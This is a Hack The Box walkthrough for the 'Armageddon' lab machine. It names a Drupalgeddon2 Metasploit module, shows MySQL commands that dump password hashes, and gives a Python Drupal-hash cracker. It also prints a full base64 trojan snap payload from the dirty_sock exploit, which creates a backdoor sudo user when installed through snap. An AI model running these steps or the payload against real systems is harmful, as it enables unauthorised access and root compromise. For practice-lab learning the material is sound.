
Armageddon Write Up – Hack The Box

Enumeration

The first step for this box is the usual one: an nmap scan to see which ports are open and which services are listening on them.

As the scan output showed, there are two ports open. My method is to start with port 80. The scan results show an Apache server running Drupal 7, and they also list several file locations. That is a lot of information from a single scan.

Foothold

After some googling I found that Drupal 7 can be exploited with a Metasploit module for Drupalgeddon2 (CVE-2018-7600). That is awesome! The module that needs to be used is shown below, plus here is a link to Rapid7.

use exploit/unix/webapp/drupal_drupalgeddon2

The set up I will leave to you because it is something that you need to be able to figure out.

USER:

After I got the shell I started browsing around to see what was available. My main rule is to check the directory the shell spawned in first; if there is nothing interesting there, look further around.

In /var/www/html/sites/default/ there was something interesting. I will leave that to you as well, because I think it is important to learn how to read different files and pick out the useful information. I will say, however, that one of the files contains credentials. Find them and put them in your notes.

Time to test the credentials. They are used to connect to the database, of course. I will post the command below, but the username and password are masked; use the credentials you discovered earlier.

mysql -u ********** -p********** -e 'show databases;'

The -u flag is the username and -p is the password (no space between -p and the password). To see the available tables, modify the previous command: select the database with -D and replace 'show databases;' with 'show tables;'. The next step is to dump the usernames and password hashes from the "users" table. The command is shown below.

mysql -u ******** -p******** -D drupal -e 'select name,pass from users;'

This will give you the password hashes. I focused on one of them, but you can try both. Cracking them is simple: put the hash in a text file and run john against it. Drupal 7 hashes start with $S$, and john recognises that prefix as its Drupal7 format, so no --format flag is needed. The command can be found below, where hash is the text file containing the hash.

john hash -w=/usr/share/wordlists/rockyou.txt
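As an added example (not code from the writeup, and not the box's hash), here is a Python port of Drupal 7's password hashing so you can see what john is actually cracking. A $S$ hash is SHA-512 iterated 2**count_log2 times over an 8-character salt, where count_log2 is encoded in the fourth character (D is the default of 15, i.e. 32768 rounds); the result is encoded with phpass-style base64 and cut to 55 characters. The hash and wordlist below are constructed here from a known password, purely to make the check runnable offline.

```python
"""Drupal 7 ($S$) password hashes: how they are built and verified.

Added example, not part of the original writeup. DEMO_HASH is made here
from a known password and a fixed salt; it is not a hash from the box.
"""
import hashlib
import math
from typing import Iterable, Optional

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
DRUPAL_HASH_LENGTH = 55  # Drupal 7 truncates the 98-char output to this


def _password_base64_encode(data: bytes) -> str:
    """phpass-style base64 used by Drupal (not RFC 4648)."""
    out = []
    i, count = 0, len(data)
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def password_crypt(algo: str, password: str, setting: str) -> Optional[str]:
    """Port of Drupal 7's _password_crypt(). `setting` is the first 12
    chars of a stored hash: $S$ + count_log2 char + 8-char salt."""
    setting = setting[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])
    if not 7 <= count_log2 <= 30:  # Drupal rejects anything outside this range
        return None
    salt = setting[4:12].encode("ascii")
    pw = password.encode("utf-8")
    digest = hashlib.new(algo, salt + pw).digest()
    for _ in range(1 << count_log2):  # this loop is why cracking is slow
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting + _password_base64_encode(digest)
    expected = 12 + math.ceil(8 * len(digest) / 6)  # 98 for sha512, 34 for md5
    if len(output) != expected:
        return None
    return output[:DRUPAL_HASH_LENGTH]


def hash_password(password: str, salt: str, count_log2: int = 15) -> str:
    """Build a Drupal 7 hash. Drupal picks the salt randomly; a fixed one is
    passed in here so the demo is deterministic. Default count_log2 15 -> 'D'."""
    if len(salt) != 8:
        raise ValueError("salt must be exactly 8 characters")
    return password_crypt("sha512", password, "$S$" + ITOA64[count_log2] + salt)


def check_password(password: str, stored_hash: str) -> bool:
    """Port of user_check_password(): $S$ is Drupal 7 sha512,
    $P$/$H$ are legacy phpass md5 hashes, anything else is rejected."""
    prefix = stored_hash[:3]
    if prefix == "$S$":
        computed = password_crypt("sha512", password, stored_hash)
    elif prefix in ("$H$", "$P$"):
        computed = password_crypt("md5", password, stored_hash)
    else:
        return False
    return computed is not None and computed == stored_hash


def crack(stored_hash: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: what john does with a wordlist, one candidate at a time."""
    for candidate in wordlist:
        if check_password(candidate, stored_hash):
            return candidate
    return None


# Constructed demo data (not from the box): a hash of a known password
# and a four-word wordlist standing in for rockyou.txt.
DEMO_HASH = hash_password("hunter2", "abcdefgh")
DEMO_WORDLIST = ["password", "123456", "hunter2", "letmein"]

if __name__ == "__main__":
    print(DEMO_HASH)
    print("cracked:", crack(DEMO_HASH, DEMO_WORDLIST))
```

The 32768 SHA-512 rounds per candidate are the whole point of the format: rockyou.txt against a single $S$D hash is tens of millions of iterated digests, so a weak password falls quickly but a long random one will not.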

When john finishes you are ready to get the user flag. Just SSH to the machine with the username and the cracked password. There you go: user.txt is right there.

If there are any questions or you get stuck, join our Discord.

ROOT:

Time to escalate privileges. First check what can be run with sudo (sudo -l).

I researched how to escalate and what I found is a script called dirty_sockv2.py, the snapd exploit for CVE-2019-7304. The link to the GitHub repo can be found here. In our case the script itself will not work, but we can use a part of it: the base64-encoded trojan snap it carries. Because snap install is allowed through sudo here, installing that snap is all we need. I will post the whole command, and if you are interested in where it comes from check the repo. Run the command on the target machine:

python2 -c 'print "aHNxcwcAAAAQIVZcAAACAAAAAAAEABEA0AIBAAQAAADgAAAAAAAAAI4DAAAAAAAAhgMAAAAAAAD//////////xICAAAAAAAAsAIAAAAAAAA+AwAAAAAAAHgDAAAAAAAAIyEvYmluL2Jhc2gKCnVzZXJhZGQgZGlydHlfc29jayAtbSAtcCAnJDYkc1daY1cxdDI1cGZVZEJ1WCRqV2pFWlFGMnpGU2Z5R3k5TGJ2RzN2Rnp6SFJqWGZCWUswU09HZk1EMXNMeWFTOTdBd25KVXM3Z0RDWS5mZzE5TnMzSndSZERoT2NFbURwQlZsRjltLicgLXMgL2Jpbi9iYXNoCnVzZXJtb2QgLWFHIHN1ZG8gZGlydHlfc29jawplY2hvICJkaXJ0eV9zb2NrICAgIEFMTD0oQUxMOkFMTCkgQUxMIiA+PiAvZXRjL3N1ZG9lcnMKbmFtZTogZGlydHktc29jawp2ZXJzaW9uOiAnMC4xJwpzdW1tYXJ5OiBFbXB0eSBzbmFwLCB1c2VkIGZvciBleHBsb2l0CmRlc2NyaXB0aW9uOiAnU2VlIGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2sKCiAgJwphcmNoaXRlY3R1cmVzOgotIGFtZDY0CmNvbmZpbmVtZW50OiBkZXZtb2RlCmdyYWRlOiBkZXZlbAqcAP03elhaAAABaSLeNgPAZIACIQECAAAAADopyIngAP8AXF0ABIAerFoU8J/e5+qumvhFkbY5Pr4ba1mk4+lgZFHaUvoa1O5k6KmvF3FqfKH62aluxOVeNQ7Z00lddaUjrkpxz0ET/XVLOZmGVXmojv/IHq2fZcc/VQCcVtsco6gAw76gWAABeIACAAAAaCPLPz4wDYsCAAAAAAFZWowA/Td6WFoAAAFpIt42A8BTnQEhAQIAAAAAvhLn0OAAnABLXQAAan87Em73BrVRGmIBM8q2XR9JLRjNEyz6lNkCjEjKrZZFBdDja9cJJGw1F0vtkyjZecTuAfMJX82806GjaLtEv4x1DNYWJ5N5RQAAAEDvGfMAAWedAQAAAPtvjkc+MA2LAgAAAAABWVo4gIAAAAAAAAAAPAAAAAAAAAAAAAAAAAAAAFwAAAAAAAAAwAAAAAAAAACgAAAAAAAAAOAAAAAAAAAAPgMAAAAAAAAEgAAAAACAAw" + "A" * 4256 + "=="' | base64 -d > filename.snap

Now install the snap file you just wrote. The --devmode flag installs it without confinement, so its install hook runs as root:

sudo /usr/bin/snap install --devmode filename.snap

The only thing left is to switch user (su dirty_sock). The username and password that should be used are both dirty_sock; the snap's install hook created that account and gave it sudo rights. If you don't know how to switch users read this. After all is done go and get your root flag.

Conclusion:

Thank you for reading the write up. If you get stuck somewhere please leave a comment and I will try to point you in the right direction.